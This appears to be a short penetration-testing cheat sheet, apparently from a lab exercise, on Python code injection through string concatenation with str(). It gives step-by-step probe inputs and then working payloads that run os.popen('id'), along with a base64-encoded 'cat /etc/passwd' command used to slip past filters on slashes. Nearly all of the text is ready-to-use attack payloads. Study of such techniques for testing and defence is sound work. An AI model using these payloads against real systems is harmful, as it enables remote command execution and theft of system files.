str() in Python

Common Command Injection Step

# Check if you can insert the following characters for param=value
# ' 
# "
# and see if you get an error.
https://ptl-ac88f0b5-ecbb39a9.libcurl.so/hello/hacker'
https://ptl-ac88f0b5-ecbb39a9.libcurl.so/hello/hacker"

# Add another comma or double-quote to see if the error goes away. 
hacker''
hacker""

# Then add a + (plus) inside the two commas or double-quotes. 
hacker"+" 
hacker"+""+" 

# %2b = + 
# Add a character inside the characters - "+"a"+" and if you get not error. 
hacker"%2b"a"%2b"

# Add the payload "+str(1)+" 
hacker"%2bstr(1)%2b"

# check the payload works - "+str(os.popen("id").read())+" 
hacker"%2bstr(os.popen("id").read())%2b"

# Chekc if the payload works - '+str(__import__('os').popen('id').read())+' 
engine=Accuweather&query=1'%2bstr(__import__('os').popen('id').read())%2b'

Base64 based Command Injection Step

# Check if you can use / (slash) inside the command. Sometimes, it does nott work. 
# In this case, you need to encode the string and decode at the runtime.

# Encode the command that you want to execute
echo 'cat /etc/passwd' | base64

# This is the result
Y2F0IC9ldGMvcGFzc3dkCg==

# Add the result to the following payload
__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')

# Let's use the following template
str(__import__('os').popen(<payload>).read())

# base64 decode-able payload looks like below
str(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')).read())

# Final payload looks like below
hacker"%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0IC9ldGMvcGFzc3dkCg==')).read())%2b"